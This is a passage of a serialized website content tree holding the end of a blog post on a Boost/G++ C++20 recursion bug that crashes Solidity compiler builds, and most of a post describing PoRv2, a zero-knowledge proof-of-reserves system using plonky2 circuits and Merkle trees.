",{"type":24,"tag":301,"props":98899,"children":98900},{"style":385},[98901],{"type":30,"value":523},{"type":24,"tag":301,"props":98903,"children":98904},{"style":369},[98905],{"type":30,"value":39261},{"type":24,"tag":301,"props":98907,"children":98908},{"style":359},[98909],{"type":30,"value":882},{"type":24,"tag":301,"props":98911,"children":98912},{"style":369},[98913],{"type":30,"value":5958},{"type":24,"tag":301,"props":98915,"children":98916},{"style":359},[98917],{"type":30,"value":492},{"type":24,"tag":301,"props":98919,"children":98920},{"class":303,"line":447},[98921],{"type":24,"tag":301,"props":98922,"children":98923},{"emptyLinePlaceholder":16},[98924],{"type":30,"value":341},{"type":24,"tag":301,"props":98926,"children":98927},{"class":303,"line":476},[98928,98932,98936,98940],{"type":24,"tag":301,"props":98929,"children":98930},{"style":308},[98931],{"type":30,"value":453},{"type":24,"tag":301,"props":98933,"children":98934},{"style":359},[98935],{"type":30,"value":873},{"type":24,"tag":301,"props":98937,"children":98938},{"style":385},[98939],{"type":30,"value":2485},{"type":24,"tag":301,"props":98941,"children":98942},{"style":359},[98943],{"type":30,"value":98944},"lengthValue)\n",{"type":24,"tag":301,"props":98946,"children":98947},{"class":303,"line":495},[98948],{"type":24,"tag":301,"props":98949,"children":98950},{"style":359},[98951],{"type":30,"value":88547},{"type":24,"tag":301,"props":98953,"children":98954},{"class":303,"line":504},[98955,98959,98963,98967,98971,98975,98979,98983,98987],{"type":24,"tag":301,"props":98956,"children":98957},{"style":308},[98958],{"type":30,"value":98845},{"type":24,"tag":301,"props":98960,"children":98961},{"style":308},[98962],{"type":30,"value":22574},{"type":24,"tag":301,"props":98964,"children":98965},{"style":359},[98966],{"type":30,"value":873},{"type":24,"tag":301,"props":98968,"children":98969},{"style":385},[98970],{"type":30,"value":772},{"type":24,"tag":301,"props":98972,"children":98973},{"style":359},[98974],{"type":30,"value":96779},{"type":24,"tag":301,"props":98976,"children":98977},{"style":385},[98978],{"type":30,"value":607},{"type":24,"tag":301,"props":98980,"children":98981},{"style":466},[98982],{"type":30,"value":685},{"type":24,"tag":301,"props":98984,"children":98985},{"style":359},[98986],{"type":30,"value":9961},{"type":24,"tag":301,"props":98988,"children":98989},{"style":1062},[98990],{"type":30,"value":98991}," // \u003C-- Infinite recursion happens here\n",{"type":24,"tag":301,"props":98993,"children":98994},{"class":303,"line":512},[98995],{"type":24,"tag":301,"props":98996,"children":98997},{"style":359},[98998],{"type":30,"value":88547},{"type":24,"tag":301,"props":99000,"children":99001},{"class":303,"line":592},[99002],{"type":24,"tag":301,"props":99003,"children":99004},{"style":359},[99005],{"type":30,"value":698},{"type":24,"tag":32,"props":99007,"children":99008},{},[99009],{"type":30,"value":99010},"Under normal circumstances, this expression is benign. But:",{"type":24,"tag":2655,"props":99012,"children":99013},{},[99014,99019,99024],{"type":24,"tag":2659,"props":99015,"children":99016},{},[99017],{"type":30,"value":99018},"G++ \u003C 14 wrongly prefers Boost's non-member operator",{"type":24,"tag":2659,"props":99020,"children":99021},{},[99022],{"type":30,"value":99023},"C++20 reverses the arguments",{"type":24,"tag":2659,"props":99025,"children":99026},{},[99027],{"type":30,"value":99028},"The non-member operator recursively calls itself",{"type":24,"tag":32,"props":99030,"children":99031},{},[99032],{"type":30,"value":99033},"💥: segmentation fault.",{"type":24,"tag":2719,"props":99035,"children":99036},{},[],{"type":24,"tag":43,"props":99038,"children":99040},{"id":99039},"part-v-what-environments-are-affected",[99041],{"type":30,"value":99042},"Part V: What Environments are Affected?",{"type":24,"tag":32,"props":99044,"children":99045},{},[99046],{"type":30,"value":99047},"If a system uses any of the following:",{"type":24,"tag":2655,"props":99049,"children":99050},{},[99051,99056,99061],{"type":24,"tag":2659,"props":99052,"children":99053},{},[99054],{"type":30,"value":99055},"G++ \u003C 14 (e.g., Ubuntu 22.04 uses 11.4)",{"type":24,"tag":2659,"props":99057,"children":99058},{},[99059],{"type":30,"value":99060},"Boost \u003C 1.75 (e.g., 1.74 ships with Ubuntu)",{"type":24,"tag":2659,"props":99062,"children":99063},{},[99064],{"type":30,"value":99065},"C++20 enabled (default in recent Solidity builds)",{"type":24,"tag":32,"props":99067,"children":99068},{},[99069,99071,99076,99078,99084],{"type":30,"value":99070},"They will encounter this crash ",{"type":24,"tag":60,"props":99072,"children":99073},{},[99074],{"type":30,"value":99075},"as soon as",{"type":30,"value":99077}," it processes a Solidity source with a length expression like ",{"type":24,"tag":145,"props":99079,"children":99081},{"className":99080},[],[99082],{"type":30,"value":99083},"T[0]",{"type":30,"value":99085}," or anything involving compile-time rational comparisons.",{"type":24,"tag":2719,"props":99087,"children":99088},{},[],{"type":24,"tag":43,"props":99090,"children":99092},{"id":99091},"recommendations",[99093],{"type":30,"value":99094},"Recommendations",{"type":24,"tag":2655,"props":99096,"children":99097},{},[99098,99106],{"type":24,"tag":2659,"props":99099,"children":99100},{},[99101],{"type":24,"tag":60,"props":99102,"children":99103},{},[99104],{"type":30,"value":99105},"Update Boost to ≥ 1.75",{"type":24,"tag":2659,"props":99107,"children":99108},{},[99109],{"type":24,"tag":60,"props":99110,"children":99111},{},[99112],{"type":30,"value":99113},"Pin G++ to v14 or later",{"type":24,"tag":2719,"props":99115,"children":99116},{},[],{"type":24,"tag":43,"props":99118,"children":99119},{"id":9652},[99120],{"type":30,"value":9655},{"type":24,"tag":32,"props":99122,"children":99123},{},[99124],{"type":30,"value":99125},"This isn’t a security vulnerability. It doesn’t corrupt memory or allow code execution.",{"type":24,"tag":32,"props":99127,"children":99128},{},[99129,99131,99135],{"type":30,"value":99130},"But it ",{"type":24,"tag":60,"props":99132,"children":99133},{},[99134],{"type":30,"value":10798},{"type":30,"value":99136}," a reminder of the fragility of modern build stacks. A bug introduced in 2012, fixed in 2024, quietly broke one of the most used blockchain compiler toolchains — all without any code in the Solidity repo being “wrong.”",{"type":24,"tag":32,"props":99138,"children":99139},{},[99140],{"type":30,"value":99141},"Every layer here — Boost, G++, the C++20 spec, and Solidity — behaved “as documented.” But together, they composed into undefined behavior.",{"type":24,"tag":32,"props":99143,"children":99144},{},[99145],{"type":30,"value":99146},"The lesson? Always test critical software under multiple compilers and library versions — especially when enabling a new language standard.",{"type":24,"tag":9672,"props":99148,"children":99149},{},[99150],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":99152},[99153,99154,99159,99162,99163,99164,99165,99166],{"id":96839,"depth":320,"text":96842},{"id":96928,"depth":320,"text":96931,"children":99155},[99156,99157,99158],{"id":96934,"depth":335,"text":96937},{"id":97002,"depth":335,"text":97005},{"id":97093,"depth":335,"text":97096},{"id":97675,"depth":320,"text":97678,"children":99160},[99161],{"id":97681,"depth":335,"text":97684},{"id":97792,"depth":320,"text":97795},{"id":98639,"depth":320,"text":98642},{"id":99039,"depth":320,"text":99042},{"id":99091,"depth":320,"text":99094},{"id":9652,"depth":320,"text":9655},"content:blog:2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug",{"_path":99171,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":99172,"description":99173,"date":99174,"author":37956,"image":99175,"isFeatured":16,"onBlogPage":16,"tags":99177,"body":99180,"_type":9700,"_id":103955,"_source":9702,"_file":103956,"_stem":103957,"_extension":9705},"/blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds","PoRv2: A Fast, Transparent ZK-Based Proof of Reserves","Here, we explore zk-proofs, Merkle trees, and our new open-source implementation, PoRv2. Our proof-of-reserve enables users to verify exchange liabilities without relying on external auditors, setting a new standard for trust.","2025-08-27",{"src":99176,"width":15,"height":15},"/posts/por/title.png",[99178,99179],"zk","por",{"type":21,"children":99181,"toc":103932},[99182,99188,99200,99212,99217,99249,99263,99269,99281,99286,99291,99328,99333,99339,99344,99351,99356,99382,99387,99393,99413,99427,99435,99440,99445,99453,99466,99472,99554,99560,99565,99578,99583,99590,99614,99622,99627,99633,99638,100085,100098,100104,100109,100117,100135,100143,100156,100164,101825,101830,101837,101843,101848,101855,101871,101878,101886,101893,103404,103409,103416,103422,103427,103454,103459,103478,103484,103492,103510,103559,103567,103586,103608,103614,103627,103632,103639,103644,103707,103712,103719,103739,103745,103750,103756,103761,103805,103810,103818,103824,103829,103871,103876,103884,103889,103897,103901,103906,103919],{"type":24,"tag":43,"props":99183,"children":99185},{"id":99184},"what-is-a-proof-of-reserves",[99186],{"type":30,"value":99187},"What is a Proof of Reserves?",{"type":24,"tag":32,"props":99189,"children":99190},{},[99191,99193,99198],{"type":30,"value":99192},"At its heart, ",{"type":24,"tag":60,"props":99194,"children":99195},{},[99196],{"type":30,"value":99197},"Proof of Reserves (PoR)",{"type":30,"value":99199}," is a crucial system designed to show that a crypto platform genuinely holds the funds it owes to its users. It's how exchanges and custodians can prove, using strong cryptographic methods, that they have enough assets to cover all customer deposits.",{"type":24,"tag":32,"props":99201,"children":99202},{},[99203,99205,99210],{"type":30,"value":99204},"Think of it this way: ",{"type":24,"tag":60,"props":99206,"children":99207},{},[99208],{"type":30,"value":99209},"PoR",{"type":30,"value":99211}," is about enabling transparency. It's a way for platforms to provide clear, verifiable evidence of their financial health. For users, it means gaining confidence that their funds are secure on the platforms they use.",{"type":24,"tag":32,"props":99213,"children":99214},{},[99215],{"type":30,"value":99216},"Historically, traditional ways of proving reserves often had drawbacks. They might reveal too much sensitive information about the platform and rely heavily on external auditors without a direct user verification method.",{"type":24,"tag":32,"props":99218,"children":99219},{},[99220,99222,99229,99231,99238,99240,99247],{"type":30,"value":99221},"We from OtterSec, in partnership with ",{"type":24,"tag":188,"props":99223,"children":99226},{"href":99224,"rel":99225},"https://backpack.exchange/",[192],[99227],{"type":30,"value":99228},"Backpack",{"type":30,"value":99230},", just developed a Proof of Reserves system that can be used to prove CEX solvency. Our ",{"type":24,"tag":188,"props":99232,"children":99235},{"href":99233,"rel":99234},"https://github.com/otter-sec/por_v2",[192],[99236],{"type":30,"value":99237},"Zero-Knowledge Proof of Reserves (PoRv2)",{"type":30,"value":99239}," was based on ",{"type":24,"tag":188,"props":99241,"children":99244},{"href":99242,"rel":99243},"https://www.okx.com/en-eu/help/zero-knowledge-proofs-what-are-zk-starks-and-how-do-they-work-v2",[192],[99245],{"type":30,"value":99246},"OKX Proof of Reserves algorithm",{"type":30,"value":99248}," since it was the fastest and most efficient one known so far. We also use recursive plonky2 as the algorithm for zero-knowledge proving, but we made some improvements to the circuits for more transparency and verifiable information on the user side, eliminating the need to trust the audit company.",{"type":24,"tag":32,"props":99250,"children":99251},{},[99252,99254,99261],{"type":30,"value":99253},"In addition, we also created and open-sourced a ",{"type":24,"tag":188,"props":99255,"children":99258},{"href":99256,"rel":99257},"https://github.com/otter-sec/por_verifier_server",[192],[99259],{"type":30,"value":99260},"PoR verifier server",{"type":30,"value":99262}," that receives the proofs and validates them.",{"type":24,"tag":43,"props":99264,"children":99266},{"id":99265},"why-do-we-use-zk-for-por",[99267],{"type":30,"value":99268},"Why do we use ZK for PoR?",{"type":24,"tag":32,"props":99270,"children":99271},{},[99272,99274,99279],{"type":30,"value":99273},"Proving reserves is crucial, but it presents a unique challenge for any platform holding user funds: how do you publicly prove solvency without also exposing sensitive user balance information or revealing proprietary financial details? This is where ",{"type":24,"tag":60,"props":99275,"children":99276},{},[99277],{"type":30,"value":99278},"Zero-Knowledge Proofs (ZKPs)",{"type":30,"value":99280}," become game-changers.",{"type":24,"tag":32,"props":99282,"children":99283},{},[99284],{"type":30,"value":99285},"Simply put, a Zero-Knowledge Proof allows one party to prove to another that a statement is true without revealing any information beyond the validity of the statement itself. Imagine proving you know a secret password without actually telling anyone the password. You confirm you possess the knowledge, but the secret remains yours.",{"type":24,"tag":32,"props":99287,"children":99288},{},[99289],{"type":30,"value":99290},"In the context of Proof of Reserves, ZKPs are perfectly suited to solve the privacy paradox. They enable a platform to prove two important things cryptographically:",{"type":24,"tag":6246,"props":99292,"children":99293},{},[99294,99311],{"type":24,"tag":2659,"props":99295,"children":99296},{},[99297,99302,99304,99310],{"type":24,"tag":60,"props":99298,"children":99299},{},[99300],{"type":30,"value":99301},"Sum proof",{"type":30,"value":99303},": The exchange liability is equal to the sum of all users' balances. (e.g: ",{"type":24,"tag":145,"props":99305,"children":99307},{"className":99306},[],[99308],{"type":30,"value":99309},"btc_liability = user1_btc + user2_btc + user3_btc + ...",{"type":30,"value":27511},{"type":24,"tag":2659,"props":99312,"children":99313},{},[99314,99319,99321,99326],{"type":24,"tag":60,"props":99315,"children":99316},{},[99317],{"type":30,"value":99318},"Non-negativity",{"type":30,"value":99320},": All users have a ",{"type":24,"tag":60,"props":99322,"children":99323},{},[99324],{"type":30,"value":99325},"positive",{"type":30,"value":99327}," net balance. This ensures that the sum proof is not tampered with by users with negative net balances. A user can have negative asset balances (e.g., borrowing BTC) but only if collateralized with other assets.",{"type":24,"tag":32,"props":99329,"children":99330},{},[99331],{"type":30,"value":99332},"It is worth noting that we cannot guarantee that all users were included in the ZK analysis. Therefore, if we only used ZKPs to prove those two statements, the exchange could tamper with the sum proof by excluding users from the PoR. That's why we also use a Merkle tree to prove inclusions.",{"type":24,"tag":43,"props":99334,"children":99336},{"id":99335},"what-is-a-merkle-tree-and-how-does-it-help-in-a-por",[99337],{"type":30,"value":99338},"What is a Merkle Tree and how does it help in a PoR?",{"type":24,"tag":32,"props":99340,"children":99341},{},[99342],{"type":30,"value":99343},"A Merkle tree is a tree data structure where each leaf node is a cryptographic hash of an individual piece of data (like a user's balance), and every non-leaf node is a cryptographic hash of its child nodes. This structure allows for the entire dataset to be summarized by a single, unique hash at the top, called the Merkle Root.",{"type":24,"tag":32,"props":99345,"children":99346},{},[99347],{"type":24,"tag":177,"props":99348,"children":99350},{"alt":179,"src":99349},"/posts/por/merkle-tree.png",[],{"type":24,"tag":32,"props":99352,"children":99353},{},[99354],{"type":30,"value":99355},"In the PoR, we can use a Merkle tree to verify the inclusion of each user in the Proof of Reserves. It works like this:",{"type":24,"tag":6246,"props":99357,"children":99358},{},[99359,99372,99377],{"type":24,"tag":2659,"props":99360,"children":99361},{},[99362,99364,99370],{"type":30,"value":99363},"The Merkle tree is generated using the leaf nodes as the hashes of the user information (e.g., ",{"type":24,"tag":145,"props":99365,"children":99367},{"className":99366},[],[99368],{"type":30,"value":99369},"sha256({id: 1, balances: {\"BTC\": 0.1, \"ETH\": 0.2, ...}})",{"type":30,"value":99371},");",{"type":24,"tag":2659,"props":99373,"children":99374},{},[99375],{"type":30,"value":99376},"The Merkle tree is made public;",{"type":24,"tag":2659,"props":99378,"children":99379},{},[99380],{"type":30,"value":99381},"Each user can download the Merkle tree and check if their account was included by hashing their account information and checking if the hash is one of the leaves;",{"type":24,"tag":32,"props":99383,"children":99384},{},[99385],{"type":30,"value":99386},"In other words, this use of the Merkle tree allows users to easily verify that their individual balance was included in the overall total.",{"type":24,"tag":43,"props":99388,"children":99390},{"id":99389},"ottersec-porv2",[99391],{"type":30,"value":99392},"OtterSec PoRv2",{"type":24,"tag":32,"props":99394,"children":99395},{},[99396,99402,99404,99411],{"type":24,"tag":188,"props":99397,"children":99399},{"href":99233,"rel":99398},[192],[99400],{"type":30,"value":99401},"We just open-sourced our Proof of Reserves code (PoRv2)",{"type":30,"value":99403},", which uses the ",{"type":24,"tag":188,"props":99405,"children":99408},{"href":99406,"rel":99407},"https://github.com/0xPolygonZero/plonky2",[192],[99409],{"type":30,"value":99410},"plonky2 ZK algorithm",{"type":30,"value":99412}," to create a Merkle tree and a final ZK proof that recursively verifies smaller sum and non-negativity proofs.",{"type":24,"tag":32,"props":99414,"children":99415},{},[99416,99418,99425],{"type":30,"value":99417},"We named it PoRv2 because we already had a version based on ",{"type":24,"tag":188,"props":99419,"children":99422},{"href":99420,"rel":99421},"https://vitalik.eth.limo/general/2022/11/19/proof_of_solvency.html",[192],[99423],{"type":30,"value":99424},"Vitalik's proof of solvency",{"type":30,"value":99426},", which was not optimal.",{"type":24,"tag":32,"props":99428,"children":99429},{},[99430],{"type":24,"tag":60,"props":99431,"children":99432},{},[99433],{"type":30,"value":99434},"Non-negativity Proof",{"type":24,"tag":32,"props":99436,"children":99437},{},[99438],{"type":30,"value":99439},"In our non-negativity proof, the circuit receives the asset balances of each user and the price of each asset. With these inputs, it calculates the account's USD balance and checks if it is greater than 0.",{"type":24,"tag":32,"props":99441,"children":99442},{},[99443],{"type":30,"value":99444},"We also check for overflows during summation to prevent tampering in the final result.",{"type":24,"tag":32,"props":99446,"children":99447},{},[99448],{"type":24,"tag":60,"props":99449,"children":99450},{},[99451],{"type":30,"value":99452},"Sum Proof",{"type":24,"tag":32,"props":99454,"children":99455},{},[99456,99458,99464],{"type":30,"value":99457},"The sum proof verifies a public circuit input that was calculated by summing up all user balances of each asset. (e.g., ",{"type":24,"tag":145,"props":99459,"children":99461},{"className":99460},[],[99462],{"type":30,"value":99463},"BTC final: user1_btc + user2_btc ...",{"type":30,"value":99465},"). Note that each asset's final sum is not USD-based; we calculate the final balance using the asset balance itself.",{"type":24,"tag":80,"props":99467,"children":99469},{"id":99468},"what-are-the-ottersec-porv2-key-points",[99470],{"type":30,"value":99471},"What are the OtterSec PoRv2 key points?",{"type":24,"tag":6246,"props":99473,"children":99474},{},[99475,99485,99503,99513,99544],{"type":24,"tag":2659,"props":99476,"children":99477},{},[99478,99483],{"type":24,"tag":60,"props":99479,"children":99480},{},[99481],{"type":30,"value":99482},"Transparency",{"type":30,"value":99484},": It is possible for the exchange to safely disclose the entire Merkle tree so users can verify it without the need for an external auditing company. Also, the code allows asset price commitments and verifications.",{"type":24,"tag":2659,"props":99486,"children":99487},{},[99488,99493,99495,99502],{"type":24,"tag":60,"props":99489,"children":99490},{},[99491],{"type":30,"value":99492},"Time-efficiency",{"type":30,"value":99494},": We were able to reduce the amount of time to prove by more than 100 times from our previous version by generating proofs for 750,000 users within 8 minutes using a Mac M3 Pro. ",{"type":24,"tag":188,"props":99496,"children":99499},{"href":99497,"rel":99498},"https://github.com/otter-sec/por_v2?tab=readme-ov-file#benchmark",[192],[99500],{"type":30,"value":99501},"Check our benchmark",{"type":30,"value":206},{"type":24,"tag":2659,"props":99504,"children":99505},{},[99506,99511],{"type":24,"tag":60,"props":99507,"children":99508},{},[99509],{"type":30,"value":99510},"Memory-efficiency",{"type":30,"value":99512},": We also were able to reduce the amount of RAM needed to prove the liabilities of millions of users. Now, we are able to use machines with 16GB.",{"type":24,"tag":2659,"props":99514,"children":99515},{},[99516,99521,99523,99528,99530,99535,99537,99542],{"type":24,"tag":60,"props":99517,"children":99518},{},[99519],{"type":30,"value":99520},"Small-proofs",{"type":30,"value":99522},": We were able to reduce the final proof to less than ",{"type":24,"tag":60,"props":99524,"children":99525},{},[99526],{"type":30,"value":99527},"500KB",{"type":30,"value":99529}," and each inclusion proof to ",{"type":24,"tag":60,"props":99531,"children":99532},{},[99533],{"type":30,"value":99534},"~52KB",{"type":30,"value":99536},". The only big file that we need to store is the Merkle tree, which doesn't consume more than ",{"type":24,"tag":60,"props":99538,"children":99539},{},[99540],{"type":30,"value":99541},"200MB",{"type":30,"value":99543}," if the PoR parameters are finely adjusted. Additionally, instead of storing each inclusion proof in a static file, we provide an efficient method to generate inclusion proofs on demand, eliminating the need for the exchange to store millions of files and conserve disk space and resources.",{"type":24,"tag":2659,"props":99545,"children":99546},{},[99547,99552],{"type":24,"tag":60,"props":99548,"children":99549},{},[99550],{"type":30,"value":99551},"Privacy",{"type":30,"value":99553},": We use many cryptographic mechanisms to ensure that the user balances and other private information are kept safe and secret.",{"type":24,"tag":43,"props":99555,"children":99557},{"id":99556},"zk-circuits",[99558],{"type":30,"value":99559},"ZK Circuits",{"type":24,"tag":32,"props":99561,"children":99562},{},[99563],{"type":30,"value":99564},"We use two different ZK circuits to generate the final proof:",{"type":24,"tag":6246,"props":99566,"children":99567},{},[99568,99573],{"type":24,"tag":2659,"props":99569,"children":99570},{},[99571],{"type":30,"value":99572},"Batch circuit",{"type":24,"tag":2659,"props":99574,"children":99575},{},[99576],{"type":30,"value":99577},"Recursive circuit",{"type":24,"tag":32,"props":99579,"children":99580},{},[99581],{"type":30,"value":99582},"With those two circuits, we can generate the proofs recursive tree:",{"type":24,"tag":32,"props":99584,"children":99585},{},[99586],{"type":24,"tag":177,"props":99587,"children":99589},{"alt":179,"src":99588},"/posts/por/batch-circuit.png",[],{"type":24,"tag":9770,"props":99591,"children":99592},{},[99593],{"type":24,"tag":32,"props":99594,"children":99595},{},[99596,99598,99604,99606,99612],{"type":30,"value":99597},"Note: We are using 512 as ",{"type":24,"tag":145,"props":99599,"children":99601},{"className":99600},[],[99602],{"type":30,"value":99603},"BATCH_SIZE",{"type":30,"value":99605}," and 8 as ",{"type":24,"tag":145,"props":99607,"children":99609},{"className":99608},[],[99610],{"type":30,"value":99611},"RECURSIVE_SIZE",{"type":30,"value":99613}," which indicates how many children each circuit has. This is easily adjustable in the code, and the optimal configuration will depend on the amount of accounts being proved in the PoR.",{"type":24,"tag":9770,"props":99615,"children":99616},{},[99617],{"type":24,"tag":32,"props":99618,"children":99619},{},[99620],{"type":30,"value":99621},"Note 2: We add empty proofs as padding to chunks that don't have the correct length.",{"type":24,"tag":32,"props":99623,"children":99624},{},[99625],{"type":30,"value":99626},"Each non-leaf node in this tree is a ZK proof, which is generated using the related circuit; each circuit also generates the Merkle tree hash of each node, which is included in the Merkle tree.",{"type":24,"tag":80,"props":99628,"children":99630},{"id":99629},"leaf-nodes",[99631],{"type":30,"value":99632},"Leaf Nodes",{"type":24,"tag":32,"props":99634,"children":99635},{},[99636],{"type":30,"value":99637},"The leaf nodes are the hashes of the account information. It is calculated in this way:",{"type":24,"tag":32,"props":99639,"children":99640},{},[99641],{"type":24,"tag":145,"props":99642,"children":99644},{"className":99643},[10807,10808],[99645],{"type":24,"tag":301,"props":99646,"children":99648},{"className":99647},[10813],[99649],{"type":24,"tag":301,"props":99650,"children":99652},{"className":99651,"ariaHidden":10819},[10818],[99653,99680],{"type":24,"tag":301,"props":99654,"children":99656},{"className":99655},[10824],[99657,99662,99667,99671,99676],{"type":24,"tag":301,"props":99658,"children":99661},{"className":99659,"style":99660},[10829],"height:0.6944em;",[],{"type":24,"tag":301,"props":99663,"children":99665},{"className":99664},[10835,28357],[99666],{"type":30,"value":2597},{"type":24,"tag":301,"props":99668,"children":99670},{"className":99669,"style":11012},[10914],[],{"type":24,"tag":301,"props":99672,"children":99674},{"className":99673},[11017],[99675],{"type":30,"value":523},{"type":24,"tag":301,"props":99677,"children":99679},{"className":99678,"style":11012},[10914],[],{"type":24,"tag":301,"props":99681,"children":99683},{"className":99682},[10824],[99684,99689,99694,99700,99705,99710,99716,99721,99726,99731,99737,99742,99748,99754,99761,99767,99773,99833,99838,99844,99849,99854,99859,99864,99869,99874,99879,99884,99889,99946,99951,99956,99961,99966,99971,99976,99983,99988,99993,99998,100004,100010,100015,100020,100025,100030,100035,100040,100045,100050,100055,100060,100065,100070,100075,100080],{"type":24,"tag":301,"props":99685,"children":99688},{"className":99686,"style":99687},[10829],"height:1.06em;vertical-align:-0.31em;",[],{"type":24,"tag":301,"props":99690,"children":99692},{"className":99691,"style":28358},[10835,28357],[99693],{"type":30,"value":28361},{"type":24,"tag":301,"props":99695,"children":99697},{"className":99696},[10835,28357],[99698],{"type":30,"value":99699},"ose",{"type":24,"tag":301,"props":99701,"children":99703},{"className":99702},[10835,28357],[99704],{"type":30,"value":10564},{"type":24,"tag":301,"props":99706,"children":99708},{"className":99707},[10835,28357],[99709],{"type":30,"value":77277},{"type":24,"tag":301,"props":99711,"children":99713},{"className":99712},[10835,28357],[99714],{"type":30,"value":99715},"o",{"type":24,"tag":301,"props":99717,"children":99719},{"className":99718},[10835,28357],[99720],{"type":30,"value":63123},{"type":24,"tag":301,"props":99722,"children":99724},{"className":99723},[28486],[99725],{"type":30,"value":362},{"type":24,"tag":301,"props":99727,"children":99729},{"className":99728},[10835,28357],[99730],{"type":30,"value":188},{"type":24,"tag":301,"props":99732,"children":99734},{"className":99733},[10835,28357],[99735],{"type":30,"value":99736},"sse",{"type":24,"tag":301,"props":99738,"children":99740},{"className":99739},[10835,28357],[99741],{"type":30,"value":28499},{"type":24,"tag":301,"props":99743,"children":99746},{"className":99744,"style":99745},[10835],"margin-right:0.02778em;",[99747],{"type":30,"value":9918},{"type":24,"tag":301,"props":99749,"children":99751},{"className":99750},[10835,28357],[99752],{"type":30,"value":99753},"ba",{"type":24,"tag":301,"props":99755,"children":99758},{"className":99756,"style":99757},[10835,28357],"margin-right:0.01968em;",[99759],{"type":30,"value":99760},"l",{"type":24,"tag":301,"props":99762,"children":99764},{"className":99763},[10835,28357],[99765],{"type":30,"value":99766},"an",{"type":24,"tag":301,"props":99768,"children":99770},{"className":99769},[10835,28357],[99771],{"type":30,"value":99772},"ce",{"type":24,"tag":301,"props":99774,"children":99776},{"className":99775},[10835],[99777,99782],{"type":24,"tag":301,"props":99778,"children":99780},{"className":99779},[10835,28357],[99781],{"type":30,"value":1724},{"type":24,"tag":301,"props":99783,"children":99785},{"className":99784},[10850],[99786],{"type":24,"tag":301,"props":99787,"children":99789},{"className":99788},[10855,28411],[99790,99821],{"type":24,"tag":301,"props":99791,"children":99793},{"className":99792},[10860],[99794,99816],{"type":24,"tag":301,"props":99795,"children":99798},{"className":99796,"style":99797},[10865],"height:0.3011em;",[99799],{"type":24,"tag":301,"props":99800,"children":99802},{"style":99801},"top:-2.55em;margin-left:0em;margin-right:0.05em;",[99803,99807],{"type":24,"tag":301,"props":99804,"children":99806},{"className":99805,"style":10875},[10874],[],{"type":24,"tag":301,"props":99808,"children":99810},{"className":99809},[10880,10881,10882,10883],[99811],{"type":24,"tag":301,"props":99812,"children":99814},{"className":99813},[10835,10883],[99815],{"type":30,"value":584},{"type":24,"tag":301,"props":99817,"children":99819},{"className":99818},[28514],[99820],{"type":30,"value":28517},{"type":24,"tag":301,"props":99822,"children":99824},{"className":99823},[10860],[99825],{"type":24,"tag":301,"props":99826,"children":99829},{"className":99827,"style":99828},[10865],"height:0.15em;",[99830],{"type":24,"tag":301,"props":99831,"children":99832},{},[],{"type":24,"tag":301,"props":99834,"children":99836},{"className":99835},[10914],[99837],{"type":30,"value":28458},{"type":24,"tag":301,"props":99839,"children":99841},{"className":99840},[10835],[99842],{"type":30,"value":99843},"∣∣",{"type":24,"tag":301,"props":99845,"children":99847},{"className":99846},[10914],[99848],{"type":30,"value":28458},{"type":24,"tag":301,"props":99850,"children":99852},{"className":99851},[10835,28357],[99853],{"type":30,"value":188},{"type":24,"tag":301,"props":99855,"children":99857},{"className":99856},[10835,28357],[99858],{"type":30,"value":99736},{"type":24,"tag":301,"props":99860,"children":99862},{"className":99861},[10835,28357],[99863],{"type":30,"value":28499},{"type":24,"tag":301,"props":99865,"children":99867},{"className":99866,"style":99745},[10835],[99868],{"type":30,"value":9918},{"type":24,"tag":301,"props":99870,"children":99872},{"className":99871},[10835,28357],[99873],{"type":30,"value":99753},{"type":24,"tag":301,"props":99875,"children":99877},{"className":99876,"style":99757},[10835,28357],[99878],{"type":30,"value":99760},{"type":24,"tag":301,"props":99880,"children":99882},{"className":99881},[10835,28357],[99883],{"type":30,"value":99766},{"type":24,"tag":301,"props":99885,"children":99887},{"className":99886},[10835,28357],[99888],{"type":30,"value":99772},{"type":24,"tag":301,"props":99890,"children":99892},{"className":99891},[10835],[99893,99898],{"type":24,"tag":301,"props":99894,"children":99896},{"className":99895},[10835,28357],[99897],{"type":30,"value":1724},{"type":24,"tag":301,"props":99899,"children":99901},{"className":99900},[10850],[99902],{"type":24,"tag":301,"props":99903,"children":99905},{"className":99904},[10855,28411],[99906,99935],{"type":24,"tag":301,"props":99907,"children":99909},{"className":99908},[10860],[99910,99930],{"type":24,"tag":301,"props":99911,"children":99913},{"className":99912,"style":99797},[10865],[99914],{"type":24,"tag":301,"props":99915,"children":99916},{"style":99801},[99917,99921],{"type":24,"tag":301,"props":99918,"children":99920},{"className":99919,"style":10875},[10874],[],{"type":24,"tag":301,"props":99922,"children":99924},{"className":99923},[10880,10881,10882,10883],[99925],{"type":24,"tag":301,"props":99926,"children":99928},{"className":99927},[10835,10883],[99929],{"type":30,"value":546},{"type":24,"tag":301,"props":99931,"children":99933},{"className":99932},[28514],[99934],{"type":30,"value":28517},{"type":24,"tag":301,"props":99936,"children":99938},{"className":99937},[10860],[99939],{"type":24,"tag":301,"props":99940,"children":99942},{"className":99941,"style":99828},[10865],[99943],{"type":24,"tag":301,"props":99944,"children":99945},{},[],{"type":24,"tag":301,"props":99947,"children":99949},{"className":99948},[10914],[99950],{"type":30,"value":28458},{"type":24,"tag":301,"props":99952,"children":99954},{"className":99953},[10835],[99955],{"type":30,"value":4054},{"type":24,"tag":301,"props":99957,"children":99959},{"className":99958},[10914],[99960],{"type":30,"value":28458},{"type":24,"tag":301,"props":99962,"children":99964},{"className":99963},[10835],[99965],{"type":30,"value":99843},{"type":24,"tag":301,"props":99967,"children":99969},{"className":99968},[10914],[99970],{"type":30,"value":28458},{"type":24,"tag":301,"props":99972,"children":99974},{"className":99973,"style":28816},[10835,28357],[99975],{"type":30,"value":28819},{"type":24,"tag":301,"props":99977,"children":99980},{"className":99978,"style":99979},[10835,28357],"margin-right:0.08125em;",[99981],{"type":30,"value":99982},"H",{"type":24,"tag":301,"props":99984,"children":99986},{"className":99985},[10835,28357],[99987],{"type":30,"value":83479},{"type":24,"tag":301,"props":99989,"children":99991},{"className":99990},[10835],[99992],{"type":30,"value":1751},{"type":24,"tag":301,"props":99994,"children":99996},{"className":99995},[28486],[99997],{"type":30,"value":362},{"type":24,"tag":301,"props":99999,"children":100001},{"className":100000},[10835,28357],[100002],{"type":30,"value":100003},